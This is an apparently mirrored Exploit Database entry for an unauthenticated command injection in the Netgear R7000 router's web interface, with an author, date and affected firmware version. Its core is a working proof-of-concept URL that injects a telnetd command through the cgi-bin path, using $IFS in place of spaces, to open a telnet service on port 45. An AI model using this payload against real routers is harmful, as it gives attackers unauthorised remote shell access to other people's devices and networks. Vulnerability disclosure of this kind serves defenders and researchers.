Netgear R7000 – Command Injection

• Exploit Database
• 106 阅读

• 作者： Acew0rm
  日期： 2016-12-07
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/40889/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  # Exploit Title: Netgear R7000 - Command Injection # Date: 6-12-2016 # Exploit Author: Acew0rm # Contact: https://twitter.com/Acew0rm1 # Vendor Homepage: https://www.netgear.com/ # Category: Hardware # Version: V1.0.7.2_1.1.93   -Vulnerability An unauthenticated user can inject commands threw http://RouterIP/cgi-bin/;COMMAND.   -Proof Of Concept http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.